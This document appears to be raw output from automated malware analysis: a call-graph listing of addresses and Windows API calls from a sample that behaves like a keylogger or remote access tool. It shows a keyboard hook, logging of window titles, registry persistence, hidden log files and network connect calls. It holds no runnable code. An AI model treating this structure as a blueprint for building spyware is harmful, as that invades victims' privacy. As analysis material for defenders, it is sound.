41bcf3 LoadLibraryA GetProcAddress 46693->46988 46695 40d783 GetModuleFileNameW 46993 40e168 46695->46993 46697 40d79f 46698 401fbd 28 API calls 46697->46698 46699 40d7ae 46698->46699 46700 401fbd 28 API calls 46699->46700 46701 40d7bd 46700->46701 47008 41afd3 46701->47008 46705 40d7cf 46706 401d8c 26 API calls 46705->46706 46707 40d7d8 46706->46707 46708 40d835 46707->46708 46709 40d7eb 46707->46709 47033 401d64 46708->47033 47286 40e986 111 API calls 46709->47286 46712 40d845 46715 401d64 28 API calls 46712->46715 46713 40d7fd 46714 401d64 28 API calls 46713->46714 46718 40d809 46714->46718 46716 40d864 46715->46716 47038 404cbf 46716->47038 47287 40e937 68 API calls 46718->47287 46719 40d873 47042 405ce6 46719->47042 46722 40d824 47288 40e155 68 API calls 46722->47288 46723 40d87f 47045 401eef 46723->47045 46726 40d88b 46727 401eea 26 API calls 46726->46727 46728 40d894 46727->46728 46730 401eea 26 API calls 46728->46730 46729 401eea 26 API calls 46731 40dc9f 46729->46731 46732 40d89d 46730->46732 46970 433ca4 GetModuleHandleW 46731->46970 46733 401d64 28 API calls 46732->46733 46734 40d8a6 46733->46734 47049 401ebd 46734->47049 46736 40d8b1 46737 401d64 28 API calls 46736->46737 46738 40d8ca 46737->46738 46739 401d64 28 API calls 46738->46739 46741 40d8e5 46739->46741 46740 40d946 46743 401d64 28 API calls 46740->46743 46758 40e134 46740->46758 46741->46740 47289 4085b4 46741->47289 46748 40d95d 46743->46748 46744 40d912 46745 401eef 26 API calls 46744->46745 46746 40d91e 46745->46746 46749 401eea 26 API calls 46746->46749 46747 40d9a4 47053 40bed7 46747->47053 46748->46747 46754 4124b7 3 API calls 46748->46754 46750 40d927 46749->46750 47293 4124b7 RegOpenKeyExA 46750->47293 46752 40d9aa 46753 40d82d 46752->46753 47056 41a473 46752->47056 46753->46729 46759 40d988 46754->46759 46757 40d9c5 46760 40da18 46757->46760 47073 40697b 46757->47073 47371 412902 30 API calls 46758->47371 46759->46747 47296 412902 30 API calls 46759->47296 46762 401d64 28 API calls 46760->46762 46765 40da21 46762->46765 46774 40da32 46765->46774 46775 40da2d 46765->46775 46767 40e14a 47372 4112b5 64 API calls ___scrt_fastfail 46767->47372 46769 40d9e4 47297 40699d 30 API calls 46769->47297 46770 40d9ee 46772 401d64 28 API calls 46770->46772 46783 40d9f7 46772->46783 46779 401d64 28 API calls 46774->46779 47300 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46775->47300 46776 40d9e9 47298 4064d0 97 API calls 46776->47298 46780 40da3b 46779->46780 47077 41ae18 46780->47077 46782 40da46 47081 401e18 46782->47081 46783->46760 46785 40da13 46783->46785 47299 4064d0 97 API calls 46785->47299 46786 40da51 47085 401e13 46786->47085 46789 40da5a 46790 401d64 28 API calls 46789->46790 46791 40da63 46790->46791 46792 401d64 28 API calls 46791->46792 46793 40da7d 46792->46793 46794 401d64 28 API calls 46793->46794 46795 40da97 46794->46795 46796 401d64 28 API calls 46795->46796 46798 40dab0 46796->46798 46797 40db1d 46799 40db2c 46797->46799 46806 40dcaa ___scrt_fastfail 46797->46806 46798->46797 46800 401d64 28 API calls 46798->46800 46801 40db35 46799->46801 46829 40dbb1 ___scrt_fastfail 46799->46829 46804 40dac5 _wcslen 46800->46804 46802 401d64 28 API calls 46801->46802 46803 40db3e 46802->46803 46805 401d64 28 API calls 46803->46805 46804->46797 46807 401d64 28 API calls 46804->46807 46808 40db50 46805->46808 47360 41265d RegOpenKeyExA 46806->47360 46809 40dae0 46807->46809 46811 401d64 28 API calls 46808->46811 46812 401d64 28 API calls 46809->46812 46813 40db62 46811->46813 46814 40daf5 46812->46814 46816 401d64 28 API calls 46813->46816 47301 40c89e 46814->47301 46815 40dcef 46817 401d64 28 API calls 46815->46817 46818 40db8b 46816->46818 46819 40dd16 46817->46819 46823 401d64 28 API calls 46818->46823 47099 401f66 46819->47099 46822 401e18 26 API calls 46825 40db14 46822->46825 46826 40db9c 46823->46826 46828 401e13 26 API calls 46825->46828 47358 40bc67 46 API calls _wcslen 46826->47358 46827 40dd25 47103 4126d2 RegCreateKeyA 46827->47103 46828->46797 47089 4128a2 46829->47089 46833 40dc45 ctype 46838 401d64 28 API calls 46833->46838 46834 40dbac 46834->46829 46836 401d64 28 API calls 46837 40dd47 46836->46837 47109 43a5f7 46837->47109 46839 40dc5c 46838->46839 46839->46815 46843 40dc70 46839->46843 46842 40dd5e 47363 41bec0 87 API calls ___scrt_fastfail 46842->47363 46845 401d64 28 API calls 46843->46845 46844 40dd81 46849 401f66 28 API calls 46844->46849 46847 40dc7e 46845->46847 46850 41ae18 28 API calls 46847->46850 46848 40dd65 CreateThread 46848->46844 48061 41c97f 10 API calls 46848->48061 46851 40dd96 46849->46851 46852 40dc87 46850->46852 46853 401f66 28 API calls 46851->46853 47359 40e219 112 API calls 46852->47359 46856 40dda5 46853->46856 46855 40dc8c 46855->46815 46858 40dc93 46855->46858 47113 41a696 46856->47113 46858->46753 46860 401d64 28 API calls 46861 40ddb6 46860->46861 46862 401d64 28 API calls 46861->46862 46863 40ddcb 46862->46863 46864 401d64 28 API calls 46863->46864 46865 40ddeb 46864->46865 46866 43a5f7 _strftime 42 API calls 46865->46866 46867 40ddf8 46866->46867 46868 401d64 28 API calls 46867->46868 46869 40de03 46868->46869 46870 401d64 28 API calls 46869->46870 46871 40de14 46870->46871 46872 401d64 28 API calls 46871->46872 46873 40de29 46872->46873 46874 401d64 28 API calls 46873->46874 46875 40de3a 46874->46875 46876 40de41 StrToIntA 46875->46876 47137 409517 46876->47137 46879 401d64 28 API calls 46880 40de5c 46879->46880 46881 40dea1 46880->46881 46882 40de68 46880->46882 46885 401d64 28 API calls 46881->46885 47364 43361d 22 API calls 3 library calls 46882->47364 46884 40de71 46887 401d64 28 API calls 46884->46887 46886 40deb1 46885->46886 46889 40def9 46886->46889 46890 40debd 46886->46890 46888 40de84 46887->46888 46891 40de8b CreateThread 46888->46891 46893 401d64 28 API calls 46889->46893 47365 43361d 22 API calls 3 library calls 46890->47365 46891->46881 48065 419138 109 API calls 2 library calls 46891->48065 46895 40df02 46893->46895 46894 40dec6 46896 401d64 28 API calls 46894->46896 46898 40df6c 46895->46898 46899 40df0e 46895->46899 46897 40ded8 46896->46897 46901 40dedf CreateThread 46897->46901 46902 401d64 28 API calls 46898->46902 46900 401d64 28 API calls 46899->46900 46904 40df1e 46900->46904 46901->46889 48064 419138 109 API calls 2 library calls 46901->48064 46903 40df75 46902->46903 46905 40df81 46903->46905 46906 40dfba 46903->46906 46907 401d64 28 API calls 46904->46907 46909 401d64 28 API calls 46905->46909 47162 41a7b2 GetComputerNameExW GetUserNameW 46906->47162 46910 40df33 46907->46910 46912 40df8a 46909->46912 47366 40c854 32 API calls 46910->47366 46917 401d64 28 API calls 46912->46917 46913 401e18 26 API calls 46914 40dfce 46913->46914 46916 401e13 26 API calls 46914->46916 46919 40dfd7 46916->46919 46920 40df9f 46917->46920 46918 40df46 46921 401e18 26 API calls 46918->46921 46922 40dfe0 SetProcessDEPPolicy 46919->46922 46923 40dfe3 CreateThread 46919->46923 46930 43a5f7 _strftime 42 API calls 46920->46930 46924 40df52 46921->46924 46922->46923 46925 40e004 46923->46925 46926 40dff8 CreateThread 46923->46926 48034 40e54f 46923->48034 46927 401e13 26 API calls 46924->46927 46928 40e019 46925->46928 46929 40e00d CreateThread 46925->46929 46926->46925 48066 410f36 138 API calls 46926->48066 46931 40df5b CreateThread 46927->46931 46933 40e073 46928->46933 46935 401f66 28 API calls 46928->46935 46929->46928 48062 411524 38 API calls ___scrt_fastfail 46929->48062 46932 40dfac 46930->46932 46931->46898 48063 40196b 49 API calls _strftime 46931->48063 47367 40b95c 7 API calls 46932->47367 47173 41246e RegOpenKeyExA 46933->47173 46936 40e046 46935->46936 47368 404c9e 28 API calls 46936->47368 46939 40e053 46941 401f66 28 API calls 46939->46941 46943 40e062 46941->46943 46942 40e12a 47184 40cbac 46942->47184 46947 41a696 79 API calls 46943->46947 46945 41ae18 28 API calls 46946 40e0a4 46945->46946 47176 412584 RegOpenKeyExW 46946->47176 46949 40e067 46947->46949 46951 401eea 26 API calls 46949->46951 46951->46933 46954 401e13 26 API calls 46957 40e0c5 46954->46957 46955 40e0ed DeleteFileW 46956 40e0f4 46955->46956 46955->46957 46959 41ae18 28 API calls 46956->46959 46957->46955 46957->46956 46958 40e0db Sleep 46957->46958 47369 401e07 46958->47369 46961 40e104 46959->46961 47181 41297a RegOpenKeyExW 46961->47181 46964 401e13 26 API calls 46965 40e121 46964->46965 46966 401e13 26 API calls 46965->46966 46966->46942 46967->46653 46968->46660 46969->46657 46970->46667 46971->46669 46972->46672 46973->46647 46974->46650 46975->46654 46976->46676 46977->46679 46978->46681 46979->46678 46981 433c81 GetStartupInfoW 46980->46981 46981->46687 46983 44ddeb 46982->46983 46984 44dde2 46982->46984 46983->46690 46987 44dcd8 51 API calls 4 library calls 46984->46987 46986->46690 46987->46983 46989 41bd32 LoadLibraryA GetProcAddress 46988->46989 46990 41bd22 GetModuleHandleA GetProcAddress 46988->46990 46991 41bd5b 32 API calls 46989->46991 46992 41bd4b LoadLibraryA GetProcAddress 46989->46992 46990->46989 46991->46695 46992->46991 47373 41a64f FindResourceA 46993->47373 46996 43a89c ___std_exception_copy 21 API calls 46997 40e192 ctype 46996->46997 46998 401f86 28 API calls 46997->46998 46999 40e1ad 46998->46999 47000 401eef 26 API calls 46999->47000 47001 40e1b8 47000->47001 47002 401eea 26 API calls 47001->47002 47003 40e1c1 47002->47003 47004 43a89c ___std_exception_copy 21 API calls 47003->47004 47005 40e1d2 ctype 47004->47005 47376 406052 47005->47376 47007 40e205 47007->46697 47021 41afe6 47008->47021 47009 401eea 26 API calls 47010 41b088 47009->47010 47011 401eea 26 API calls 47010->47011 47013 41b090 47011->47013 47012 41b058 47014 403b60 28 API calls 47012->47014 47016 401eea 26 API calls 47013->47016 47017 41b064 47014->47017 47019 40d7c6 47016->47019 47020 401eef 26 API calls 47017->47020 47018 401eef 26 API calls 47018->47021 47029 40e8bd 47019->47029 47022 41b06d 47020->47022 47021->47012 47021->47018 47024 401eea 26 API calls 47021->47024 47028 41b056 47021->47028 47379 403b60 47021->47379 47382 41bfb9 28 API calls 47021->47382 47023 401eea 26 API calls 47022->47023 47025 41b075 47023->47025 47024->47021 47383 41bfb9 28 API calls 47025->47383 47028->47009 47030 40e8ca 47029->47030 47032 40e8da 47030->47032 47400 40200a 26 API calls 47030->47400 47032->46705 47034 401d6c 47033->47034 47035 401d74 47034->47035 47401 401fff 28 API calls 47034->47401 47035->46712 47039 404ccb 47038->47039 47402 402e78 47039->47402 47041 404cee 47041->46719 47411 404bc4 47042->47411 47044 405cf4 47044->46723 47046 401efe 47045->47046 47048 401f0a 47046->47048 47420 4021b9 26 API calls 47046->47420 47048->46726 47051 401ec9 47049->47051 47050 401ee4 47050->46736 47051->47050 47052 402325 28 API calls 47051->47052 47052->47050 47421 401e8f 47053->47421 47055 40bee1 CreateMutexA GetLastError 47055->46752 47423 41b16b 47056->47423 47058 41a481 47427 412513 RegOpenKeyExA 47058->47427 47061 401eef 26 API calls 47062 41a4af 47061->47062 47063 401eea 26 API calls 47062->47063 47064 41a4b7 47063->47064 47065 412513 31 API calls 47064->47065 47066 41a50a 47064->47066 47067 41a4dd 47065->47067 47066->46757 47068 41a4e8 StrToIntA 47067->47068 47069 41a4ff 47068->47069 47070 41a4f6 47068->47070 47072 401eea 26 API calls 47069->47072 47432 41c112 28 API calls 47070->47432 47072->47066 47074 40698f 47073->47074 47075 4124b7 3 API calls 47074->47075 47076 406996 47075->47076 47076->46769 47076->46770 47078 41ae2c 47077->47078 47433 40b027 47078->47433 47080 41ae34 47080->46782 47082 401e27 47081->47082 47084 401e33 47082->47084 47442 402121 26 API calls 47082->47442 47084->46786 47086 402121 47085->47086 47087 402150 47086->47087 47443 402718 26 API calls _Deallocate 47086->47443 47087->46789 47090 4128c0 47089->47090 47091 406052 28 API calls 47090->47091 47092 4128d5 47091->47092 47093 401fbd 28 API calls 47092->47093 47094 4128e5 47093->47094 47095 4126d2 29 API calls 47094->47095 47096 4128ef 47095->47096 47097 401eea 26 API calls 47096->47097 47098 4128fc 47097->47098 47098->46833 47100 401f6e 47099->47100 47444 402301 47100->47444 47104 412722 47103->47104 47106 4126eb 47103->47106 47105 401eea 26 API calls 47104->47105 47107 40dd3b 47105->47107 47108 4126fd RegSetValueExA RegCloseKey 47106->47108 47107->46836 47108->47104 47110 43a610 _strftime 47109->47110 47448 43994e 47110->47448 47114 41a747 47113->47114 47115 41a6ac GetLocalTime 47113->47115 47117 401eea 26 API calls 47114->47117 47116 404cbf 28 API calls 47115->47116 47118 41a6ee 47116->47118 47119 41a74f 47117->47119 47120 405ce6 28 API calls 47118->47120 47121 401eea 26 API calls 47119->47121 47123 41a6fa 47120->47123 47122 40ddaa 47121->47122 47122->46860 47482 4027cb 47123->47482 47125 41a706 47126 405ce6 28 API calls 47125->47126 47127 41a712 47126->47127 47485 406478 76 API calls 47127->47485 47129 41a720 47130 401eea 26 API calls 47129->47130 47131 41a72c 47130->47131 47132 401eea 26 API calls 47131->47132 47133 41a735 47132->47133 47134 401eea 26 API calls 47133->47134 47135 41a73e 47134->47135 47136 401eea 26 API calls 47135->47136 47136->47114 47138 409536 _wcslen 47137->47138 47139 409541 47138->47139 47140 409558 47138->47140 47141 40c89e 32 API calls 47139->47141 47142 40c89e 32 API calls 47140->47142 47143 409549 47141->47143 47144 409560 47142->47144 47145 401e18 26 API calls 47143->47145 47146 401e18 26 API calls 47144->47146 47161 409553 47145->47161 47147 40956e 47146->47147 47148 401e13 26 API calls 47147->47148 47149 409576 47148->47149 47505 40856b 28 API calls 47149->47505 47150 401e13 26 API calls 47152 4095ad 47150->47152 47490 409837 47152->47490 47153 409588 47506 4028cf 47153->47506 47157 409593 47158 401e18 26 API calls 47157->47158 47159 40959d 47158->47159 47160 401e13 26 API calls 47159->47160 47160->47161 47161->47150 47686 403b40 47162->47686 47166 41a80d 47167 4028cf 28 API calls 47166->47167 47168 41a817 47167->47168 47169 401e13 26 API calls 47168->47169 47170 41a820 47169->47170 47171 401e13 26 API calls 47170->47171 47172 40dfc3 47171->47172 47172->46913 47174 41248f RegQueryValueExA RegCloseKey 47173->47174 47175 40e08b 47173->47175 47174->47175 47175->46942 47175->46945 47177 4125b0 RegQueryValueExW RegCloseKey 47176->47177 47178 4125dd 47176->47178 47177->47178 47179 403b40 28 API calls 47178->47179 47180 40e0ba 47179->47180 47180->46954 47182 412992 RegDeleteValueW 47181->47182 47183 40e117 47181->47183 47182->47183 47183->46964 47185 40cbc5 47184->47185 47186 41246e 3 API calls 47185->47186 47187 40cbcc 47186->47187 47191 40cbeb 47187->47191 47708 401602 47187->47708 47189 40cbd9 47711 4127d5 RegCreateKeyA 47189->47711 47192 413fd4 47191->47192 47193 413feb 47192->47193 47728 41aa83 47193->47728 47195 413ff6 47196 401d64 28 API calls 47195->47196 47197 41400f 47196->47197 47198 43a5f7 _strftime 42 API calls 47197->47198 47199 41401c 47198->47199 47200 414021 Sleep 47199->47200 47201 41402e 47199->47201 47200->47201 47202 401f66 28 API calls 47201->47202 47203 41403d 47202->47203 47204 401d64 28 API calls 47203->47204 47205 41404b 47204->47205 47206 401fbd 28 API calls 47205->47206 47207 414053 47206->47207 47208 41afd3 28 API calls 47207->47208 47209 41405b 47208->47209 47732 404262 WSAStartup 47209->47732 47211 414065 47212 401d64 28 API calls 47211->47212 47213 41406e 47212->47213 47214 401d64 28 API calls 47213->47214 47261 4140ed 47213->47261 47215 414087 47214->47215 47218 401d64 28 API calls 47215->47218 47216 401d64 28 API calls 47216->47261 47217 401fbd 28 API calls 47217->47261 47219 414098 47218->47219 47221 401d64 28 API calls 47219->47221 47220 41afd3 28 API calls 47220->47261 47222 4140a9 47221->47222 47224 401d64 28 API calls 47222->47224 47223 4085b4 28 API calls 47223->47261 47225 4140ba 47224->47225 47226 401d64 28 API calls 47225->47226 47228 4140cb 47226->47228 47227 401eef 26 API calls 47227->47261 47229 401d64 28 API calls 47228->47229 47230 4140dd 47229->47230 47865 404101 87 API calls 47230->47865 47233 414244 WSAGetLastError 47866 41bc86 30 API calls 47233->47866 47238 414259 47242 401d8c 26 API calls 47238->47242 47243 401d64 28 API calls 47238->47243 47244 43a5f7 _strftime 42 API calls 47238->47244 47238->47261 47281 401f66 28 API calls 47238->47281 47282 41a696 79 API calls 47238->47282 47283 414b22 CreateThread 47238->47283 47284 401eea 26 API calls 47238->47284 47285 401e13 26 API calls 47238->47285 47867 404c9e 28 API calls 47238->47867 47869 40a767 84 API calls 47238->47869 47870 4047eb 98 API calls 47238->47870 47241 404cbf 28 API calls 47241->47261 47242->47238 47243->47238 47245 414b80 Sleep 47244->47245 47245->47238 47246 405ce6 28 API calls 47246->47261 47247 4027cb 28 API calls 47247->47261 47248 401f66 28 API calls 47248->47261 47249 41a696 79 API calls 47249->47261 47250 401eea 26 API calls 47250->47261 47253 4082dc 28 API calls 47253->47261 47254 440c61 26 API calls 47254->47261 47255 41265d 3 API calls 47255->47261 47256 412513 31 API calls 47256->47261 47257 403b40 28 API calls 47257->47261 47261->47216 47261->47217 47261->47220 47261->47223 47261->47227 47261->47233 47261->47238 47261->47241 47261->47246 47261->47247 47261->47248 47261->47249 47261->47250 47261->47253 47261->47254 47261->47255 47261->47256 47261->47257 47262 41ad56 28 API calls 47261->47262 47263 401d64 28 API calls 47261->47263 47733 413f9a 47261->47733 47738 4041f1 47261->47738 47745 404915 47261->47745 47760 40428c connect 47261->47760 47820 41a97d 47261->47820 47823 413683 47261->47823 47826 40cbf1 47261->47826 47832 41adfe 47261->47832 47835 41aed8 47261->47835 47262->47261 47264 4144ed GetTickCount 47263->47264 47265 41ad56 28 API calls 47264->47265 47277 414507 47265->47277 47267 41ad56 28 API calls 47267->47277 47270 41aed8 28 API calls 47270->47277 47272 405ce6 28 API calls 47272->47277 47273 40275c 28 API calls 47273->47277 47274 4027cb 28 API calls 47274->47277 47276 401eea 26 API calls 47276->47277 47277->47267 47277->47270 47277->47272 47277->47273 47277->47274 47277->47276 47278 401e13 26 API calls 47277->47278 47839 41acb0 GetLastInputInfo GetTickCount 47277->47839 47840 41ac62 47277->47840 47845 40e679 GetLocaleInfoA 47277->47845 47848 4027ec 28 API calls 47277->47848 47849 4045d5 47277->47849 47868 404468 60 API calls ctype 47277->47868 47278->47277 47281->47238 47282->47238 47283->47238 48027 419e99 103 API calls 47283->48027 47284->47238 47285->47238 47286->46713 47287->46722 47290 4085c0 47289->47290 47291 402e78 28 API calls 47290->47291 47292 4085e4 47291->47292 47292->46744 47294 4124e1 RegQueryValueExA RegCloseKey 47293->47294 47295 41250b 47293->47295 47294->47295 47295->46740 47296->46747 47297->46776 47298->46770 47299->46760 47300->46774 47302 40c8ba 47301->47302 47303 40c8da 47302->47303 47304 40c90f 47302->47304 47305 40c8d0 47302->47305 48028 41a75b 29 API calls 47303->48028 47308 41b16b 2 API calls 47304->47308 47307 40ca03 GetLongPathNameW 47305->47307 47310 403b40 28 API calls 47307->47310 47311 40c914 47308->47311 47309 40c8e3 47312 401e18 26 API calls 47309->47312 47313 40ca18 47310->47313 47314 40c918 47311->47314 47315 40c96a 47311->47315 47353 40c8ed 47312->47353 47316 403b40 28 API calls 47313->47316 47318 403b40 28 API calls 47314->47318 47317 403b40 28 API calls 47315->47317 47320 40ca27 47316->47320 47321 40c978 47317->47321 47319 40c926 47318->47319 47327 403b40 28 API calls 47319->47327 48031 40cc37 28 API calls 47320->48031 47326 403b40 28 API calls 47321->47326 47322 401e13 26 API calls 47322->47305 47324 40ca3a 48032 402860 28 API calls 47324->48032 47329 40c98e 47326->47329 47330 40c93c 47327->47330 47328 40ca45 48033 402860 28 API calls 47328->48033 48030 402860 28 API calls 47329->48030 48029 402860 28 API calls 47330->48029 47334 40ca4f 47337 401e13 26 API calls 47334->47337 47335 40c999 47338 401e18 26 API calls 47335->47338 47336 40c947 47339 401e18 26 API calls 47336->47339 47340 40ca59 47337->47340 47341 40c9a4 47338->47341 47342 40c952 47339->47342 47343 401e13 26 API calls 47340->47343 47344 401e13 26 API calls 47341->47344 47345 401e13 26 API calls 47342->47345 47346 40ca62 47343->47346 47347 40c9ad 47344->47347 47348 40c95b 47345->47348 47349 401e13 26 API calls 47346->47349 47350 401e13 26 API calls 47347->47350 47351 401e13 26 API calls 47348->47351 47352 40ca6b 47349->47352 47350->47353 47351->47353 47354 401e13 26 API calls 47352->47354 47353->47322 47355 40ca74 47354->47355 47356 401e13 26 API calls 47355->47356 47357 40ca7d 47356->47357 47357->46822 47358->46834 47359->46855 47361 412683 RegQueryValueExA RegCloseKey 47360->47361 47362 4126a7 47360->47362 47361->47362 47362->46815 47363->46848 47364->46884 47365->46894 47366->46918 47367->46906 47368->46939 47370 401e0c 47369->47370 47371->46767 47374 40e183 47373->47374 47375 41a66c LoadResource LockResource SizeofResource 47373->47375 47374->46996 47375->47374 47377 401f86 28 API calls 47376->47377 47378 406066 47377->47378 47378->47007 47384 403c30 47379->47384 47382->47021 47383->47028 47385 403c39 47384->47385 47388 403c59 47385->47388 47389 403c68 47388->47389 47394 4032a4 47389->47394 47391 403c74 47392 402325 28 API calls 47391->47392 47393 403b73 47392->47393 47393->47021 47395 4032b0 47394->47395 47396 4032ad 47394->47396 47399 4032b6 28 API calls 47395->47399 47396->47391 47400->47032 47404 402e85 47402->47404 47403 402ea9 47403->47041 47404->47403 47405 402e98 47404->47405 47406 402eae 47404->47406 47409 403445 28 API calls 47405->47409 47406->47403 47410 40225b 26 API calls 47406->47410 47409->47403 47410->47403 47412 404bd0 47411->47412 47415 40245c 47412->47415 47414 404be4 47414->47044 47416 402469 47415->47416 47418 402478 47416->47418 47419 402ad3 28 API calls 47416->47419 47418->47414 47419->47418 47420->47048 47422 401e94 47421->47422 47424 41b193 47423->47424 47425 41b178 GetCurrentProcess IsWow64Process 47423->47425 47424->47058 47425->47424 47426 41b18f 47425->47426 47426->47058 47428 412541 RegQueryValueExA RegCloseKey 47427->47428 47429 412569 47427->47429 47428->47429 47430 401f66 28 API calls 47429->47430 47431 41257e 47430->47431 47431->47061 47432->47069 47434 40b02f 47433->47434 47437 40b04b 47434->47437 47436 40b045 47436->47080 47438 40b055 47437->47438 47440 40b060 47438->47440 47441 40b138 28 API calls 47438->47441 47440->47436 47441->47440 47442->47084 47443->47087 47445 40230d 47444->47445 47446 402325 28 API calls 47445->47446 47447 401f80 47446->47447 47447->46827 47466 43a555 47448->47466 47450 43999b 47475 4392ee 38 API calls 3 library calls 47450->47475 47451 439960 47451->47450 47452 439975 47451->47452 47465 40dd54 47451->47465 47473 445364 20 API calls __dosmaperr 47452->47473 47455 43997a 47474 43a837 26 API calls _Deallocate 47455->47474 47456 4399a7 47459 4399d6 47456->47459 47476 43a59a 42 API calls __Toupper 47456->47476 47462 439a42 47459->47462 47477 43a501 26 API calls 2 library calls 47459->47477 47478 43a501 26 API calls 2 library calls 47462->47478 47463 439b09 _strftime 47463->47465 47479 445364 20 API calls __dosmaperr 47463->47479 47465->46842 47465->46844 47467 43a55a 47466->47467 47468 43a56d 47466->47468 47480 445364 20 API calls __dosmaperr 47467->47480 47468->47451 47470 43a55f 47481 43a837 26 API calls _Deallocate 47470->47481 47472 43a56a 47472->47451 47473->47455 47474->47465 47475->47456 47476->47456 47477->47462 47478->47463 47479->47465 47480->47470 47481->47472 47486 401e9b 47482->47486 47484 4027d9 47484->47125 47485->47129 47487 401ea7 47486->47487 47488 40245c 28 API calls 47487->47488 47489 401eb9 47488->47489 47489->47484 47491 409855 47490->47491 47492 4124b7 3 API calls 47491->47492 47493 40985c 47492->47493 47494 409870 47493->47494 47495 40988a 47493->47495 47496 4095cf 47494->47496 47497 409875 47494->47497 47509 4082dc 47495->47509 47496->46879 47500 4082dc 28 API calls 47497->47500 47502 409883 47500->47502 47535 409959 29 API calls 47502->47535 47504 409888 47504->47496 47505->47153 47677 402d8b 47506->47677 47508 4028dd 47508->47157 47510 4082eb 47509->47510 47536 408431 47510->47536 47512 408309 47513 4098a5 47512->47513 47541 40affa 47513->47541 47516 4098f6 47519 401f66 28 API calls 47516->47519 47517 4098ce 47518 401f66 28 API calls 47517->47518 47520 4098d8 47518->47520 47521 409901 47519->47521 47523 41ae18 28 API calls 47520->47523 47522 401f66 28 API calls 47521->47522 47524 409910 47522->47524 47525 4098e6 47523->47525 47526 41a696 79 API calls 47524->47526 47545 40a876 31 API calls ___std_exception_copy 47525->47545 47528 409915 CreateThread 47526->47528 47530 409930 CreateThread 47528->47530 47531 40993c CreateThread 47528->47531 47557 4099a9 47528->47557 47529 4098ed 47532 401eea 26 API calls 47529->47532 47530->47531 47554 409993 47530->47554 47533 401e13 26 API calls 47531->47533 47551 4099b5 47531->47551 47532->47516 47534 409950 47533->47534 47534->47496 47535->47504 47676 40999f 135 API calls 47535->47676 47537 40843d 47536->47537 47539 40845b 47537->47539 47540 402f0d 28 API calls 47537->47540 47539->47512 47540->47539 47543 40b006 47541->47543 47542 4098c3 47542->47516 47542->47517 47543->47542 47546 403b9e 47543->47546 47545->47529 47547 403ba8 47546->47547 47549 403bb3 47547->47549 47550 403cfd 28 API calls 47547->47550 47549->47542 47550->47549 47560 40a3f4 47551->47560 47609 4099e4 47554->47609 47631 409e48 47557->47631 47566 40a402 47560->47566 47561 4099be 47562 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 47563 40b027 28 API calls 47562->47563 47563->47566 47566->47561 47566->47562 47568 41acb0 GetLastInputInfo GetTickCount 47566->47568 47569 40a4a2 GetWindowTextW 47566->47569 47571 401e13 26 API calls 47566->47571 47572 40a5ff 47566->47572 47573 40affa 28 API calls 47566->47573 47575 40a569 Sleep 47566->47575 47578 401f66 28 API calls 47566->47578 47579 40a4f1 47566->47579 47583 405ce6 28 API calls 47566->47583 47585 4028cf 28 API calls 47566->47585 47586 41ae18 28 API calls 47566->47586 47587 409d58 27 API calls 47566->47587 47588 401eea 26 API calls 47566->47588 47589 433529 5 API calls __Init_thread_wait 47566->47589 47590 4338b5 29 API calls __onexit 47566->47590 47591 4334df EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 47566->47591 47592 4082a8 28 API calls 47566->47592 47594 40b0dd 28 API calls 47566->47594 47595 40ae58 44 API calls 2 library calls 47566->47595 47596 440c61 47566->47596 47600 404c9e 28 API calls 47566->47600 47568->47566 47569->47566 47571->47566 47574 401e13 26 API calls 47572->47574 47573->47566 47574->47561 47575->47566 47578->47566 47579->47566 47581 4082dc 28 API calls 47579->47581 47593 40a876 31 API calls ___std_exception_copy 47579->47593 47581->47579 47583->47566 47585->47566 47586->47566 47587->47566 47588->47566 47589->47566 47590->47566 47591->47566 47592->47566 47593->47579 47594->47566 47595->47566 47597 440c6d 47596->47597 47601 440a5d 47597->47601 47600->47566 47602 440a74 47601->47602 47606 440ab5 47602->47606 47607 445364 20 API calls __dosmaperr 47602->47607 47604 440aab 47608 43a837 26 API calls _Deallocate 47604->47608 47606->47566 47607->47604 47608->47606 47610 409a63 GetMessageA 47609->47610 47611 4099ff SetWindowsHookExA 47609->47611 47612 409a75 TranslateMessage DispatchMessageA 47610->47612 47624 40999c 47610->47624 47611->47610 47614 409a1b GetLastError 47611->47614 47612->47610 47612->47624 47625 41ad56 47614->47625 47618 409a3e 47619 401f66 28 API calls 47618->47619 47620 409a4d 47619->47620 47621 41a696 79 API calls 47620->47621 47622 409a52 47621->47622 47623 401eea 26 API calls 47622->47623 47623->47624 47626 440c61 26 API calls 47625->47626 47627 41ad77 47626->47627 47628 401f66 28 API calls 47627->47628 47629 409a31 47628->47629 47630 404c9e 28 API calls 47629->47630 47630->47618 47632 409e5d Sleep 47631->47632 47651 409d97 47632->47651 47634 4099b2 47635 409e9d CreateDirectoryW 47639 409e6f 47635->47639 47636 409eae GetFileAttributesW 47636->47639 47637 401d64 28 API calls 47637->47639 47638 409ec5 SetFileAttributesW 47638->47639 47639->47632 47639->47634 47639->47635 47639->47636 47639->47637 47639->47638 47642 409f10 47639->47642 47664 41b59f 47639->47664 47641 409f3f PathFileExistsW 47641->47642 47642->47641 47644 401f86 28 API calls 47642->47644 47645 40a048 SetFileAttributesW 47642->47645 47646 406052 28 API calls 47642->47646 47647 401eef 26 API calls 47642->47647 47648 401eea 26 API calls 47642->47648 47650 401eea 26 API calls 47642->47650 47673 41b62a 32 API calls 47642->47673 47674 41b697 CreateFileW SetFilePointer WriteFile CloseHandle 47642->47674 47644->47642 47645->47639 47646->47642 47647->47642 47648->47642 47650->47639 47652 409e44 47651->47652 47655 409dad 47651->47655 47652->47639 47653 409dcc CreateFileW 47654 409dda GetFileSize 47653->47654 47653->47655 47654->47655 47656 409e0f CloseHandle 47654->47656 47655->47653 47655->47656 47657 409e21 47655->47657 47658 409e04 Sleep 47655->47658 47659 409dfd 47655->47659 47656->47655 47657->47652 47661 4082dc 28 API calls 47657->47661 47658->47656 47675 40a7f0 83 API calls 47659->47675 47662 409e3d 47661->47662 47663 4098a5 126 API calls 47662->47663 47663->47652 47665 41b5b2 CreateFileW 47664->47665 47667 41b5eb 47665->47667 47668 41b5ef 47665->47668 47667->47639 47669 41b606 WriteFile 47668->47669 47670 41b5f6 SetFilePointer 47668->47670 47671 41b61b CloseHandle 47669->47671 47672 41b619 47669->47672 47670->47669 47670->47671 47671->47667 47672->47671 47673->47642 47674->47642 47675->47658 47678 402d97 47677->47678 47681 4030f7 47678->47681 47680 402dab 47680->47508 47682 403101 47681->47682 47684 403115 47682->47684 47685 4036c2 28 API calls 47682->47685 47684->47680 47685->47684 47687 403b48 47686->47687 47693 